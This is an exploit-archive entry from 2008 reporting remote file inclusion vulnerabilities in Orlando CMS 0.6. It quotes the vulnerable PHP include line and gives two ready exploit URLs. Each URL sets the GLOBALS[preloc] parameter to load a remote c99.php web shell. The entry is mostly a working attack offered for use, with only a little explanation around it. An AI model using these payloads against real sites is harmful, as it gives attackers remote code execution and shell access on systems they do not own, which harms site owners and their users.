[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Orlando CMS 0.6 Remote File Inclusion Vulnerabilities
# Published : 2008-06-19
# Author : Ciph3r
# Previous Title : CMS-BRD (menuclick) Remote SQL Injection Vulnerability
# Next Title : CaupoShop Classic 1.3 (saArticle[ID]) Remote SQL Injection Vulnerability
###############################################################
#
# Orlando CMS classes Remote File Include Vulnerabilities
#
###############################################################
#
# Discovered by : Ciph3r
#
#
# MAIL : Ciph3r_blackhat@yahoo.com
#
#
# SP TANX4 : Iranian hacker & Kurdish Security TEAM
#
#
# CLASS : remote
#
# download cms: http://sourceforge.net/project/showfiles.php?group_id=195547
#
################################################################
#
# C0de :
#
#
# include($GLOBALS['preloc']."modules/core/logger/sticky.php");
#
#
###############################################################
EXPLOIT :
http://127.0.0.1/cms/Orlando/modules/core/logger/init.php?GLOBALS[preloc]=http://127.0.0.1/c99.php?
http://127.0.0.1/cms/Orlando/AJAX/newscat.php?GLOBALS[preloc]=http://127.0.0.1/c99.php?
#####################################################################
# www.Syue.com [2008-06-19]